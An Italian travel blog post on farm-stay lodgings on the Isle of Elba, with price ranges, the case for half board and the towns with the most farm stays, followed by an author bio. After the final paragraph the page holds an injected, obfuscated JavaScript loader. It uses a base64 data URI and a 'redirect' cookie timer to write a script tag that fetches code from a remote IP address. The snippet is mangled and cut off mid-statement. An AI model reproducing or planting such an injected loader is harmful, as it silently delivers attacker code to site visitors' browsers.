3G6D8543

Agriturismi sull’Isola d’Elba: i prezzi e le soluzioni

Voglia di risparmiare? Ecco i prezzi degli agriturismi sull’isola d’Elba

Se siete intenzionati a scegliere un agriturismo all’Isola d’Elba con prezzi contenuti, dovete sapere che alcune strutture sono in grado di offrire, oltre a soggiorni in appartamenti o camere, anche roulotte, chalet o case di legno.

È sufficiente leggere le recensioni degli agriturismi sull’Isola d’Elba su Tripadvisor per rendersi conto di quante soluzioni differenti offra questa categoria: che si scelga un agriturismo all’Elba con mezza pensione oppure uno con solo pernottamento, le strutture che troverete si trovano tutte in luoghi molto tranquilli, avvolte dal verde e gestite da persone estremamente ospitali sempre disposte a darvi consigli su come passare al meglio il vostro soggiorno. Atmosfere informali, olii e vini tipici, prodotti direttamente colti dall’orto offrono un servizio di ristorazione unico che vi convincerà a scegliere un agriturismo all’Isola d’Elba con mezza pensione. Non tutte le strutture hanno anche un servizio di ristorazione e d’estate soprattutto potrebbe essere difficile trovare posto per mangiare: il vantaggio della mezza pensione è quello di essere sicuri di cenare sempre con cibi locali, di qualità e fatti in casa, senza nessuna fatica.

Magari a pranzo bastano un frutto o un gelato, ma la sera almeno è meglio andare sul sicuro. Per gli agriturismi dell’isola d’Elba i prezzi chiaramente variano molto in base ai diversi periodi dell’anno. Si va dai 34€ a notte in bassa stagione, solo pernottamento e prima colazione ai 380€ per la mezza pensione nei periodi più cari. Non è escluso che per soggiorni lunghi o prenotazioni con anticipo, possiate ottenere anche ulteriori sconti molto vantaggiosi.

Porto Azzurro, Portoferraio, Marina di Campo, Campo nell’Elba, Rio Marina sono le località con maggior densità di strutture agrituristiche: in campagna, ma allo stesso tempo vicino ai maggiori servizi dell’isola, panorami suggestivi e profumi mediterranei, cortesia ed aria di famiglia, con poche camere per conservarne al massimo lo spirito casalingo. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Share this post

Federica Mazzei

Elbana di nascita, giramondo per natura. Nata nel 1984 consegue nel 2007 una laurea triennale in Comunicazione sociale e nel 2009 una laurea magistrale con lode in Sistemi e progetti di comunicazione, prosegue il percorso formativo con una borsa di studio di due anni presso la Scuola Superiore Sant'Anna di Pisa (attività di supporto e potenziamento Ufficio Relazioni con il Pubblico, progettazione Piani integrati a livello di Zona distretto). Esperienze lavorative nel settore delle relazioni al pubblico, negli enti del terzo settore e nella comunicazione digitale.

Nessun commento

Aggiungi commento